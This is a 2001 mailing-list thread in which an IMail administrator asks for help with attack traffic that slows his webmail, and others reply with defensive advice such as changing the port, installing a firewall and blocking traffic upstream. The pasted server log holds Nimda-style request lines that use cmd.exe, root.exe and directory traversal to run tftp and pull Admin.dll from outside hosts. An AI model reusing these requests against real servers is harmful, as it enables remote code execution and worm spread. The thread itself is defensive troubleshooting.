Scot,
I solved this problem by calling my upstream provider. I let them know that
I was being DoS'ed and we came up with a solution to block all of those
requests right at the the border router for out subnets. This way not only
do they not make it to my machines, they dont make it through my pipe at all
and my bandwidth stays mine. I belive all upstream providers will be
willing to do it
good luck
Todd
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Scot Desort
Sent: Friday, September 21, 2001 11:13 AM
To: [EMAIL PROTECTED]
Subject: Re: [imail] DoS Attack on IMail Web Messaging?? HELP!
Charles:
Some ideas:
1. Can you temporarily run web messaging on a different port number, like 81
or 8383? It may be an inconvenience to inform your users, but the effect of
the attacks would stop instantly as the Code Red I/II/Nimda requests come in
on port 80, which would no longer be running on your server
2. Install something like BlackIce on the server. BlackIce will pick up
these requests and block them from reaching the server, leaving your
WebMessaging to run and process normal port 80 requests without the load of
the attack requests.
Good luck
--
Scot
----- Original Message -----
From: "Charles Short" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 21, 2001 10:29 AM
Subject: [imail] DoS Attack on IMail Web Messaging?? HELP!
Hello,
I know this message is long, but I called Ipswitch Support twice on
Wednesday about a problem I am having with my IMail Server and the phone
support I have gotten has not addressed my issue here and I need all the
help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a. I
am only running IMail on this machine. No IIS or other server programs.
We started seeing problems on Tuesday like everyone else, but we are
running IMail on a server by itself... No IIS. I am seeing a lot of
malformed header requests in the logs like the Code Red I & II virus does to
IIS servers and -- this is the odd part -- some BRO*.tmp files in my spool
directory that are most definitely being caused by people browsing WebMail.
It is causing web messaging to crawl, but other than that I have not seen
what everyone else seems to be seeing with the Nimda virus. No other
characteristics of the Nimda virus at all. I honestly do not believe that we
have been infected...
Here is a snippet from the logs...
------------------------------
20010918 111401 208.180.242.21, , , GET
/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dl
l HTTP/1.0
20010918 111401 208.234.121.72, , , GET
/MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll
HTTP/1.0
20010918 111401 205.218.122.146, , , GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%2
0d:\Admin.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET /MSADC/Admin.dll HTTP/1.0
20010918 111401 205.218.122.146, , , GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%2
0e:\Admin.dll HTTP/1.0
20010918 111401 208.168.189.178, , , GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%2
0d:\Admin.dll HTTP/1.0
20010918 111402 205.218.55.2, , , GET /scripts/Admin.dll HTTP/1.0
20010918 111402 208.168.64.117, , , GET
/scripts/root.exe?/c+tftp%20-i%20208.168.64.117%20GET%20Admin.dll%20Admin.dl
l HTTP/1.0
20010918 111402 208.168.189.178, , , GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%2
0c:\Admin.dll HTTP/1.0
20010918 111402 208.27.235.69, , , GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20208.27.235.69%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
20010918 111402 205.197.162.130, , , GET
/MSADC/root.exe?/c+tftp%20-i%20205.197.162.132%20GET%20Admin.dll%20Admin.dll
HTTP/1.0
20010918 111402 208.217.166.229, , , GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0
20010918 111402 208.168.189.178, , , GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%2
0e:\Admin.dll HTTP/1.0
20010918 111402 208.177.252.132, , , GET
/MSADC/root.exe?/c+tftp%20-i%20208.177.252.132%20GET%20Admin.dll%20Admin.dll
HTTP/1.0
20010918 111402 208.234.121.72, , , GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0
20010918 111402 208.168.171.3, , , GET
/scripts/root.exe?/c+tftp%20-i%20208.168.171.12%20GET%20Admin.dll%20Admin.dl
l HTTP/1.0
------------------------------
When I called the other day the assumption was that it was the Nimda virus
and the Ipswitch support guys said to run a virus program and reload the web
template files to fix it and that has done nothing at all to help. I even
went ahead and made the upgrade from 6.06 to v.7.03 Wednesday night and no
progress. I have all of the virus definitions for Norton and I've done
SEVERAL system scans with Norton, House Call and the FIX_NIMDA.EXE program
from Trend Micro and all came up empty handed. I just can't believe that the
Nimda has gotten into our system... Is anyone else seeing these BRO*.tmp
files or is it just me?
This seems to be a problem specific to IMail's Web Messaging program not
properly filtering out these malformed request. When Web Messaging is off,
the server runs like a dream. It is one thing to patch an IIS server with a
patch from the product vendor, but I honestly don't have a clue as to what
else I can do to stop this DoS attack from happening on my IMail box without
implementing a firewall system for that server. I am seeing a ton of
incoming traffic in our T1 logs so I know that it is coming in from the
outside, but what I need to know is what can I do to make IMail filter out
these requests? Help please.
Charles Short
[EMAIL PROTECTED]
Systems Administrator
Orotech
Web Services
http://www.orotech.net
910.350.7980 voice
910.350.7976 fax
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
